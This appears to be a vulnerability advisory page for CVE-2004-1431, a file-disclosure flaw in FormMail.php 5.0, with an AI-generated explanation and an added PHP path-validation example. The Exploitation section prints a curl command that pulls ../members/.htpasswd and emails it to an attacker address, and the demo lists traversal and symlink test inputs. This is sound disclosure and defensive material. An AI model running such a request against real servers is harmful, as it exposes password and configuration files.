Unrated severity · NVD Advisory · Published Dec 31, 2004 · Updated Apr 16, 2026

CVE-2004-1431

Description

FormMail.php 5.0 allows remote attackers to read arbitrary files via the ar_file parameter, leading to information disclosure.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

In FormMail.php version 5.0 (and possibly others), the script accepts an ar_file parameter intended for auto-reply functionality. The script uses file_exists() and fopen() to read the file specified in ar_file and send its contents via email. This parameter is not sanitized, allowing an attacker to specify a path to any file on the server, including sensitive files like .htpasswd. The vulnerability is present in the default configuration and requires no special conditions beyond the ability to send a POST request to the script [1].

Exploitation

An attacker can exploit this by sending a POST request with the ar_file parameter set to a full path or relative path (e.g., ../members/.htpasswd) and an email parameter. The script will then read the specified file and email its contents to the attacker's provided address. No authentication or user interaction is required; only network access to the script is needed. An example using curl: curl -e http://yoursite.com/ -d ar_file=../members/.htpasswd -d email=attacker@example.com http://yoursite.com/cgi-bin/formmail.php [1].

Impact

Successful exploitation allows an attacker to read arbitrary files from the server, leading to information disclosure of sensitive data such as password files, configuration files, or source code. The attacker gains no direct code execution but obtains file contents via email, which can be used for further attacks [1].

Mitigation

The recommended fix is to remove the auto-reply code block that reads and emails ar_file. The Bugtraq post [1] provides the exact code to remove. Alternatively, the vendor should implement proper validation and sanitization of the ar_file parameter. No official patch from Jack's Scripts was mentioned; users should apply the workaround or disable the vulnerable script. The vulnerability was disclosed without a fix, so manual mitigation is required [1].
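
One way to do the validation mentioned above, as an added example that is not taken from the advisory, the Bugtraq post or FormMail.php itself. The function name resolve_autoreply_file, the fixed templates directory and the .txt naming rule are assumptions, and the sample files are constructed for the demo (POSIX filesystem assumed).

```php
<?php
// Added example: hypothetical helper, not FormMail.php's own code.
// Resolves a client-supplied auto-reply template name to a file inside one
// fixed directory, or returns null. $baseDir is an assumed server-side
// setting; it must never come from the request.
function resolve_autoreply_file(string $requested, string $baseDir): ?string
{
    // Accept a bare file name only: no separators, no leading dot, .txt suffix.
    if (!preg_match('/\A[A-Za-z0-9][A-Za-z0-9_-]{0,63}\.txt\z/', $requested)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() resolves symlinks and ".." and fails if the file is missing.
    $path = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($path === false || !is_file($path)) {
        return null;
    }
    // Containment check on the resolved path, so a symlink placed in the
    // template directory cannot point outside it.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a temporary template directory with a secret beside it.
$root = sys_get_temp_dir() . '/ar_demo_' . bin2hex(random_bytes(4));
mkdir("$root/templates", 0700, true);
mkdir("$root/members", 0700, true);
file_put_contents("$root/templates/thanks.txt", "Thank you for your message.\n");
file_put_contents("$root/members/.htpasswd", "constructed:placeholder\n");
symlink("$root/members/.htpasswd", "$root/templates/leak.txt");

// One legitimate name, then relative, absolute, symlink, NUL-byte and
// missing-file inputs that the helper must refuse.
$cases = ['thanks.txt', '../members/.htpasswd', "$root/members/.htpasswd",
          'leak.txt', "thanks.txt\0.php", 'missing.txt'];
foreach ($cases as $case) {
    $ok = resolve_autoreply_file($case, "$root/templates");
    printf("%-45s %s\n", json_encode($case), $ok === null ? 'rejected' : 'accepted');
}
```

The containment check runs on the path after realpath() has resolved it, which is why the symlinked leak.txt is refused even though its name passes the pattern.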

AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 2

Patches: 0. No patches discovered yet.

References: 4